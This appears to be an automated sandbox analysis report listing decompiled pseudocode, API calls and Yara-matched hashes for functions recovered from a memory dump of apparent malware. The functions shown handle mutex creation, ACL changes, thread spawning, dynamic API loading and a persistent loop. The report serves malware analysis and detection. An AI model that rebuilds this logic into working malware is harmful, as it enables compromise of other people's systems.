                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileMove
                                    • String ID: %s.%u
                                    • API String ID: 3562171763-1288070821
                                    • Opcode ID: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
                                    • Instruction ID: 16c242f961a16b44c7ea8ae58b162dabe7e8efe05d509a60da4a7651e3b0c8da
                                    • Opcode Fuzzy Hash: abb1974d68a3cf11a90f5f4fc4a910d84dcf3eeb1d4c396366a110d1392bc96d
                                    • Instruction Fuzzy Hash: 07318B753053509AE664FB65DC8AFAE339ADB90754F14002EFA058B2C3EF2AD905C762
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E000C2AEA() {
                                    				intOrPtr _v8;
                                    				signed int _v12;
                                    				CHAR* _v16;
                                    				signed int _t16;
                                    				intOrPtr _t21;
                                    				intOrPtr _t22;
                                    				void* _t26;
                                    				void* _t29;
                                    				signed int _t31;
                                    				intOrPtr _t36;
                                    				CHAR* _t38;
                                    				intOrPtr _t39;
                                    				void* _t40;
                                    
                                    				_t15 =  *0xde710 * 0x64;
                                    				_t39 = 0;
                                    				_v12 =  *0xde710 * 0x64;
                                    				_t16 = E000C8604(_t15);
                                    				_t38 = _t16;
                                    				_v16 = _t38;
                                    				if(_t38 != 0) {
                                    					_t31 =  *0xde710; // 0x2
                                    					_t36 = 0;
                                    					_v8 = 0;
                                    					if(_t31 == 0) {
                                    						L9:
                                    						_push(_t38);
                                    						E000C9F48(0xe); // executed
                                    						E000C861A( &_v16, _t39);
                                    						return 0;
                                    					}
                                    					_t29 = 0;
                                    					do {
                                    						_t21 =  *0xde714; // 0x27bfe88
                                    						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
                                    							if(_t39 != 0) {
                                    								lstrcatA(_t38, "|");
                                    								_t39 = _t39 + 1;
                                    							}
                                    							_t22 =  *0xde714; // 0x27bfe88
                                    							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
                                    							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
                                    							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
                                    							_t31 =  *0xde710; // 0x2
                                    							_t40 = _t40 + 0x18;
                                    							_t36 = _v8;
                                    							_t39 = _t39 + _t26;
                                    						}
                                    						_t36 = _t36 + 1;
                                    						_t29 = _t29 + 0x20;
                                    						_v8 = _t36;
                                    					} while (_t36 < _t31);
                                    					goto L9;
                                    				}
                                    				return _t16 | 0xffffffff;
                                    			}

















                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeaplstrcat
                                    • String ID: %u;%u;%u
                                    • API String ID: 3011335133-2973439046
                                    • Opcode ID: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
                                    • Instruction ID: c18da029e8387f57c48651e8e1138d8feb965970a6bd18960df813de622e7610
                                    • Opcode Fuzzy Hash: 2094acf824114d6b149425799c8295bbb7a354877be0ea23f216adc157b61f9a
                                    • Instruction Fuzzy Hash: A4110632A01304ABDB14EFA9DCC5E9E7BB9EB84324B10446EE900DB191CB349D00CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E000CBD10() {
                                    				char _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				short _v20;
                                    				char _v24;
                                    				short _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				void _v96;
                                    				intOrPtr _t58;
                                    				intOrPtr _t61;
                                    				intOrPtr _t63;
                                    				intOrPtr _t65;
                                    				intOrPtr _t67;
                                    				intOrPtr _t70;
                                    				intOrPtr _t73;
                                    				intOrPtr _t77;
                                    				intOrPtr _t79;
                                    				intOrPtr _t81;
                                    				intOrPtr _t85;
                                    				intOrPtr _t87;
                                    				signed int _t90;
                                    				void* _t92;
                                    				intOrPtr _t93;
                                    				void* _t98;
                                    
                                    				_t90 = 8;
                                    				_v28 = 0xf00;
                                    				_v32 = 0;
                                    				_v24 = 0;
                                    				memset( &_v96, 0, _t90 << 2);
                                    				_v20 = 0x100;
                                    				_push( &_v12);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_v16 = 0;
                                    				_push(0);
                                    				_v8 = 0;
                                    				_push(1);
                                    				_v12 = 0;
                                    				_push( &_v24);
                                    				_t58 =  *0xde68c; // 0x27bfab8
                                    				_t98 = 0;
                                    				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                                    					L14:
                                    					if(_v8 != 0) {
                                    						_t67 =  *0xde68c; // 0x27bfab8
                                    						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                                    					}
                                    					if(_v12 != 0) {
                                    						_t65 =  *0xde68c; // 0x27bfab8
                                    						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                                    					}
                                    					if(_t98 != 0) {
                                    						_t63 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                                    					}
                                    					if(_v16 != 0) {
                                    						_t61 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                                    					}
                                    					L22:
                                    					return _t98;
                                    				}
                                    				_v68 = _v12;
                                    				_t70 =  *0xde688; // 0xf0000
                                    				_t92 = 2;
                                    				_v96 = 0x1fffff;
                                    				_v92 = 0;
                                    				_v88 = 3;
                                    				_v76 = 0;
                                    				_v72 = 5;
                                    				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                                    					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                                    						goto L7;
                                    					}
                                    					goto L4;
                                    				} else {
                                    					L4:
                                    					_push( &_v8);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(0);
                                    					_push(1);
                                    					_push(_t92);
                                    					_push(_t92);
                                    					_push( &_v32);
                                    					_t85 =  *0xde68c; // 0x27bfab8
                                    					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                                    						goto L14;
                                    					} else {
                                    						_t87 = _v8;
                                    						if(_t87 != 0) {
                                    							_push(2);
                                    							_pop(1);
                                    							_v64 = 0x1fffff;
                                    							_v60 = 1;
                                    							_v56 = 3;
                                    							_v44 = 0;
                                    							_v40 = 1;
                                    							_v36 = _t87;
                                    						}
                                    						L7:
                                    						_push( &_v16);
                                    						_push(0);
                                    						_push( &_v96);
                                    						_t73 =  *0xde68c; // 0x27bfab8
                                    						_push(1); // executed
                                    						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                                    							goto L14;
                                    						}
                                    						_t98 = LocalAlloc(0x40, 0x14);
                                    						if(_t98 == 0) {
                                    							goto L14;
                                    						}
                                    						_t93 =  *0xde68c; // 0x27bfab8
                                    						_push(1);
                                    						_push(_t98);
                                    						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                                    							goto L14;
                                    						}
                                    						_t77 =  *0xde68c; // 0x27bfab8
                                    						_push(0);
                                    						_push(_v16);
                                    						_push(1);
                                    						_push(_t98);
                                    						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                                    							goto L14;
                                    						}
                                    						if(_v8 != 0) {
                                    							_t81 =  *0xde68c; // 0x27bfab8
                                    							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                                    						}
                                    						_t79 =  *0xde68c; // 0x27bfab8
                                    						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                                    						goto L22;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
                                    • LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocEntriesLocal
                                    • String ID:
                                    • API String ID: 2146116654-0
                                    • Opcode ID: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
                                    • Instruction ID: fb9cf3d49498b04ba18fc6af388e3f93cc6b6c7a00e5ba42f1d92bd048f5cdbb
                                    • Opcode Fuzzy Hash: 1d99a57611baaec703b87adae8a6e6c7168fee3c9c6b929967c5ce84b8f1f07f
                                    • Instruction Fuzzy Hash: C5512B71901248EFDB20DF99D889FDDBBF8EF44700F15806AF605AB2A0D7748944CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _t45;
                                    				intOrPtr _t46;
                                    				intOrPtr _t48;
                                    				intOrPtr _t49;
                                    				void* _t52;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				struct _SECURITY_ATTRIBUTES* _t58;
                                    				intOrPtr _t59;
                                    				intOrPtr _t61;
                                    				intOrPtr _t65;
                                    				intOrPtr _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t69;
                                    				struct _SECURITY_ATTRIBUTES* _t73;
                                    				intOrPtr _t74;
                                    				intOrPtr _t77;
                                    				intOrPtr _t78;
                                    				intOrPtr _t79;
                                    				intOrPtr _t82;
                                    				intOrPtr _t83;
                                    				void* _t86;
                                    				intOrPtr _t87;
                                    				intOrPtr _t89;
                                    				signed int _t92;
                                    				intOrPtr _t97;
                                    				intOrPtr _t98;
                                    				int _t106;
                                    				intOrPtr _t110;
                                    				signed int _t112;
                                    				signed int _t113;
                                    				void* _t115;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 = __edx;
                                    				_v12 = __ecx;
                                    				_t77 =  *0xde76c; // 0x1cc
                                    				_t73 = 0;
                                    				if(E000CA4BF(_t77, 0x7530) >= 0) {
                                    					_t45 =  *0xde770; // 0x2631ee8
                                    					_t112 = 0;
                                    					_t106 = 0;
                                    					do {
                                    						_t78 =  *((intOrPtr*)(_t106 + _t45));
                                    						if(_t78 == 0) {
                                    							L6:
                                    							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
                                    								_t113 = _t112 << 5;
                                    								if(_v8 == _t73) {
                                    									 *(_t113 + _t45 + 0x10) = _t73;
                                    									_t46 =  *0xde770; // 0x2631ee8
                                    									 *(_t113 + _t46 + 0xc) = _t73;
                                    									L14:
                                    									_t79 =  *0xde770; // 0x2631ee8
                                    									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
                                    									_t48 =  *0xde770; // 0x2631ee8
                                    									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
                                    									_t49 = E000CA471(0, 1);
                                    									_t82 =  *0xde770; // 0x2631ee8
                                    									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
                                    									_t83 =  *0xde770; // 0x2631ee8
                                    									_t30 = _t83 + _t113 + 4; // 0x2631eec
                                    									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
                                    									_t53 =  *0xde770; // 0x2631ee8
                                    									 *(_t113 + _t53) = _t52;
                                    									_t54 =  *0xde770; // 0x2631ee8
                                    									_t86 =  *(_t113 + _t54);
                                    									if(_t86 != 0) {
                                    										SetThreadPriority(_t86, 0xffffffff);
                                    										_t87 =  *0xde770; // 0x2631ee8
                                    										 *0xde774 =  *0xde774 + 1;
                                    										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
                                    										_t74 =  *0xde770; // 0x2631ee8
                                    										_t73 = _t74 + _t113;
                                    									} else {
                                    										_t59 =  *0xde684; // 0x27bf8f0
                                    										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
                                    										_t61 =  *0xde770; // 0x2631ee8
                                    										_t37 = _t61 + 0xc; // 0x2631ef4
                                    										_t91 = _t37 + _t113;
                                    										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
                                    											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
                                    											_t61 =  *0xde770; // 0x2631ee8
                                    										}
                                    										_t92 = 8;
                                    										memset(_t113 + _t61, 0, _t92 << 2);
                                    									}
                                    									L19:
                                    									_t89 =  *0xde76c; // 0x1cc
                                    									E000CA4DB(_t89);
                                    									_t58 = _t73;
                                    									L20:
                                    									return _t58;
                                    								}
                                    								_t110 = _a4;
                                    								_t65 = E000C8604(_t110);
                                    								_t97 =  *0xde770; // 0x2631ee8
                                    								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
                                    								_t66 =  *0xde770; // 0x2631ee8
                                    								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
                                    									goto L19;
                                    								}
                                    								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
                                    								_t67 =  *0xde770; // 0x2631ee8
                                    								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
                                    								_t115 = _t115 + 0xc;
                                    								goto L14;
                                    							}
                                    							goto L7;
                                    						}
                                    						_t69 =  *0xde684; // 0x27bf8f0
                                    						_push(_t73);
                                    						_push(_t78);
                                    						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
                                    							_t45 =  *0xde770; // 0x2631ee8
                                    							goto L7;
                                    						}
                                    						_t98 =  *0xde770; // 0x2631ee8
                                    						E000C984A(_t106 + _t98, 0);
                                    						_t45 =  *0xde770; // 0x2631ee8
                                    						goto L6;
                                    						L7:
                                    						_t106 = _t106 + 0x20;
                                    						_t112 = _t112 + 1;
                                    					} while (_t106 < 0x1000);
                                    					goto L19;
                                    				}
                                    				_t58 = 0;
                                    				goto L20;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
                                    • Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
                                    • Opcode Fuzzy Hash: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
                                    • Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E000C5631(void* __edx, void* __edi) {
                                    				char _v44;
                                    				void* _t8;
                                    				intOrPtr _t11;
                                    				intOrPtr _t14;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				void* _t20;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t36;
                                    				void* _t39;
                                    				void* _t40;
                                    				intOrPtr _t49;
                                    				void* _t54;
                                    
                                    				_t54 = __edi;
                                    				_t8 = E000C9E66(0x3b); // executed
                                    				if(_t8 != 0xffffffff) {
                                    					L2:
                                    					E000C980C(0xde6c8);
                                    					_t39 = 0x37; // executed
                                    					E000C9F06(_t39);
                                    					_t11 =  *0xde688; // 0xf0000
                                    					_t40 = 0x3a; // executed
                                    					E000C9F06(_t40); // executed
                                    					E000CE4C1(_t63);
                                    					_t14 =  *0xde688; // 0xf0000
                                    					_t41 =  &_v44;
                                    					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
                                    					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
                                    					_t17 =  *0xde684; // 0x27bf8f0
                                    					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
                                    					 *0xde74c = _t18;
                                    					if(_t18 != 0) {
                                    						_t20 = CreateMutexA(0, 0, 0);
                                    						 *0xde76c = _t20;
                                    						__eflags = _t20;
                                    						if(_t20 != 0) {
                                    							_t34 = E000C8604(0x1000); // executed
                                    							_t52 = 0;
                                    							 *0xde770 = _t34;
                                    							_t49 =  *0xde774; // 0x2
                                    							__eflags = _t34;
                                    							_t41 =  !=  ? 0 : _t49;
                                    							 *0xde774 =  !=  ? 0 : _t49; // executed
                                    						}
                                    						E000C153B(_t41, _t52); // executed
                                    						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
                                    						E000C3017(); // executed
                                    						E000C31C2(0, __eflags); // executed
                                    						E000C29B1(); // executed
                                    						E000C3BB2(_t54, __eflags); // executed
                                    						while(1) {
                                    							__eflags =  *0xde758; // 0x0
                                    							if(__eflags != 0) {
                                    								break;
                                    							}
                                    							E000C980C(0xde750);
                                    							_push(0xde750);
                                    							_push(0xde750); // executed
                                    							E000C279B();
                                    							Sleep(0xfa0);
                                    						}
                                    						E000C3D34();
                                    						E000C9A8E();
                                    						E000C34CB();
                                    						_t33 = 0;
                                    						__eflags = 0;
                                    					} else {
                                    						goto L3;
                                    					}
                                    				} else {
                                    					_t36 = E000C2DCB();
                                    					_t63 = _t36;
                                    					if(_t36 != 0) {
                                    						L3:
                                    						_t33 = 1;
                                    					} else {
                                    						goto L2;
                                    					}
                                    				}
                                    				return _t33;
                                    			}


















                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0
                                      • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
                                    • Sleep.KERNELBASE(00000FA0), ref: 000C574A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Time$CreateFileMutexSleepSystem
                                    • String ID:
                                    • API String ID: 1795067453-0
                                    • Opcode ID: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
                                    • Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
                                    • Opcode Fuzzy Hash: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
                                    • Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 27%
                                    			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr _t26;
                                    				intOrPtr _t27;
                                    				intOrPtr _t29;
                                    				intOrPtr _t34;
                                    				intOrPtr* _t39;
                                    				void* _t47;
                                    				intOrPtr _t55;
                                    				intOrPtr _t58;
                                    				char _t60;
                                    
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t50 = _a4;
                                    				_t60 = 0;
                                    				_v12 = 0;
                                    				if(_a4 != 0) {
                                    					_t47 = E000CA63B(_t50);
                                    					if(_t47 == 0) {
                                    						L11:
                                    						_t26 = 0;
                                    						L12:
                                    						L13:
                                    						return _t26;
                                    					}
                                    					_t27 =  *0xde684; // 0x27bf8f0
                                    					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                                    					if(_t58 == 0) {
                                    						L9:
                                    						_t29 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                                    						if(_t60 != 0) {
                                    							E000C861A( &_v12, 0);
                                    						}
                                    						goto L11;
                                    					}
                                    					_t4 = _t58 + 1; // 0x1
                                    					_t34 = E000C8604(_t4); // executed
                                    					_t60 = _t34;
                                    					_v12 = _t60;
                                    					if(_t60 == 0) {
                                    						goto L9;
                                    					}
                                    					_a4 = _a4 & 0;
                                    					_push(0);
                                    					_v8 = 0;
                                    					_push( &_a4);
                                    					_push(_t58);
                                    					_push(_t60);
                                    					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                                    						if(_a4 == 0) {
                                    							if(_v8 != _t58) {
                                    								goto L9;
                                    							}
                                    							_t39 = _a8;
                                    							 *((char*)(_t58 + _t60)) = 0;
                                    							if(_t39 != 0) {
                                    								 *_t39 = _t58;
                                    							}
                                    							CloseHandle(_t47);
                                    							_t26 = _t60;
                                    							goto L12;
                                    						}
                                    						_t55 = _v8 + _a4;
                                    						_a4 = _a4 & 0x00000000;
                                    						_push(0);
                                    						_push( &_a4);
                                    						_v8 = _t55;
                                    						_push(_t58 - _t55);
                                    						_push(_t55 + _t60);
                                    					}
                                    					goto L9;
                                    				}
                                    				_t26 = 0;
                                    				goto L13;
                                    			}















                                    APIs
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
                                    • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,027BFD30,00000400), ref: 000CA776
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleRead
                                    • String ID:
                                    • API String ID: 2331702139-0
                                    • Opcode ID: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
                                    • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
                                    • Opcode Fuzzy Hash: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
                                    • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E000C153B(void* __ecx, void* __edx) {
                                    				void* _v8;
                                    				void* _t3;
                                    				signed int _t4;
                                    				intOrPtr _t7;
                                    				signed int _t9;
                                    				intOrPtr _t10;
                                    				void* _t24;
                                    
                                    				_push(__ecx);
                                    				_t3 = CreateMutexA(0, 0, 0);
                                    				 *0xde6f4 = _t3;
                                    				if(_t3 == 0) {
                                    					L11:
                                    					_t4 = _t3 | 0xffffffff;
                                    					__eflags = _t4;
                                    				} else {
                                    					_t3 = CreateMutexA(0, 0, 0);
                                    					 *0xde6dc = _t3;
                                    					if(_t3 == 0) {
                                    						goto L11;
                                    					} else {
                                    						_t3 = E000C1080(0x4ac);
                                    						_v8 = _t3;
                                    						if(_t3 == 0) {
                                    							goto L11;
                                    						} else {
                                    							 *0xde6e8 = E000C91A6(_t3, 0);
                                    							E000C85C2( &_v8);
                                    							_t7 = E000C8604(0x100);
                                    							 *0xde6f0 = _t7;
                                    							if(_t7 != 0) {
                                    								 *0xde6fc = 0;
                                    								_t9 = E000C8604(0x401);
                                    								 *0xde6d4 = _t9;
                                    								__eflags = _t9;
                                    								if(_t9 != 0) {
                                    									__eflags =  *0xde6c0; // 0x0
                                    									if(__eflags == 0) {
                                    										E000D15B6(E000C8202, 0xc820b);
                                    									}
                                    									_push(0x61e);
                                    									_t24 = 8;
                                    									_t10 = E000CE1BC(0xdbd28, _t24); // executed
                                    									 *0xde6a0 = _t10;
                                    									_t4 = 0;
                                    								} else {
                                    									_push(0xfffffffc);
                                    									goto L5;
                                    								}
                                    							} else {
                                    								_push(0xfffffffe);
                                    								L5:
                                    								_pop(_t4);
                                    							}
                                    						}
                                    					}
                                    				}
                                    				return _t4;
                                    			}











                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateMutex$AllocateHeap
                                    • String ID:
                                    • API String ID: 704353917-0
                                    • Opcode ID: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
                                    • Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
                                    • Opcode Fuzzy Hash: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
                                    • Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E000C5974(void* __ecx, void* __edx, void* __eflags) {
                                    				void* _v8;
                                    				char _v12;
                                    				char _v52;
                                    				intOrPtr _t16;
                                    				void* _t19;
                                    				intOrPtr _t27;
                                    				void* _t42;
                                    
                                    				_t42 = __edx;
                                    				_v8 = 0;
                                    				E000CA86D( &_v52, __ecx, __eflags);
                                    				_t16 =  *0xde688; // 0xf0000
                                    				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
                                    					L1:
                                    					_t27 =  *0xde684; // 0x27bf8f0
                                    					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
                                    					goto L1;
                                    				}
                                    				_push(0);
                                    				_push( &_v52);
                                    				_push("\\");
                                    				_v12 = E000C9292("Global");
                                    				_t19 = E000C590C(_t18, _t42,  &_v8); // executed
                                    				__eflags = _t19 - 1;
                                    				if(_t19 == 1) {
                                    					CloseHandle(_v8);
                                    					_v8 = 0;
                                    					E000C590C( &_v52, _t42,  &_v8); // executed
                                    				}
                                    				E000C861A( &_v12, 0xffffffff);
                                    				return _v8;
                                    			}











                                    APIs
                                    • CloseHandle.KERNELBASE(000C5DD4,?,?,?,?,00000002), ref: 000C59DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: Global
                                    • API String ID: 2962429428-4020866741
                                    • Opcode ID: 3e7d5dd301a71e63a3836bfe50b69a12b6a9b87e59ec28fc4f01eec1221f2752
                                    • Instruction ID: 4ba206982d4dc08780ad7651fb4155ee72ffab201f78b51dab85fb8038c37bd4
                                    • Opcode Fuzzy Hash: 3e7d5dd301a71e63a3836bfe50b69a12b6a9b87e59ec28fc4f01eec1221f2752
                                    • Instruction Fuzzy Hash: 0011A576E00218EBDB00EB98DD45DDDB7F8EB94311F2101AAF405E7292DA30AE40C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 47%
                                    			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v8;
                                    				char _t5;
                                    				struct HINSTANCE__* _t7;
                                    				void* _t10;
                                    				void* _t12;
                                    				void* _t22;
                                    				void* _t25;
                                    
                                    				_push(__ecx);
                                    				_t12 = __ecx;
                                    				_t22 = __edx;
                                    				_t5 = E000C95C7(_a4);
                                    				_t25 = 0;
                                    				_v8 = _t5;
                                    				_push(_t5);
                                    				if(_a4 != 0x7c3) {
                                    					_t7 = LoadLibraryA(); // executed
                                    				} else {
                                    					_t7 = GetModuleHandleA();
                                    				}
                                    				if(_t7 != 0) {
                                    					_t10 = E000CE171(_t12, _t22, _t7); // executed
                                    					_t25 = _t10;
                                    				}
                                    				E000C85C2( &_v8);
                                    				return _t25;
                                    			}











                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
                                    • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 4133054770-0
                                    • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
                                    • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
                                    • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
                                    • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
